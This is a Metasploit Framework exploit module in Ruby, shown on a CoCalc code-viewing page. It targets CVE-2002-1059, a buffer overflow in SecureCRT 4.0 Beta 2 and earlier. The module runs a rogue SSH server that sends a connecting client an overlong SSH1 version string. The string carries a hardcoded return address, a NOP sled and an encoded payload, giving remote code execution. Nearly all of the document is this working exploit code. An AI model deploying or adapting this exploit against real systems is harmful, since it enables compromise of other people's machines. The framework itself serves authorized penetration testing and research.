Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ssh/securecrt_ssh1.rb
19611 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::TcpServer
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'SecureCRT SSH1 Buffer Overflow',
16
'Description' => %q{
17
This module exploits a buffer overflow in SecureCRT <= 4.0
18
Beta 2. By sending a vulnerable client an overly long
19
SSH1 protocol identifier string, it is possible to execute
20
arbitrary code.
21
22
This module has only been tested on SecureCRT 3.4.4.
23
},
24
'Author' => 'MC',
25
'License' => MSF_LICENSE,
26
'References' => [
27
[ 'CVE', '2002-1059' ],
28
[ 'OSVDB', '4991' ],
29
[ 'BID', '5287' ],
30
],
31
'DefaultOptions' => {
32
'EXITFUNC' => 'process',
33
},
34
'Payload' => {
35
'Space' => 400,
36
'BadChars' => "\x00",
37
'MaxNops' => 0,
38
'StackAdjustment' => -3500,
39
},
40
'Platform' => 'win',
41
'Targets' => [
42
[ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],
43
],
44
'Privileged' => false,
45
'DisclosureDate' => '2002-07-23',
46
'DefaultTarget' => 0,
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
55
register_options(
56
[
57
OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
58
]
59
)
60
end
61
62
def on_client_connect(client)
63
return if ((p = regenerate_payload(client)) == nil)
64
65
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
66
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
67
68
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
69
70
client.put(buffer)
71
handler
72
73
service.close_client(client)
74
end
75
end
76
77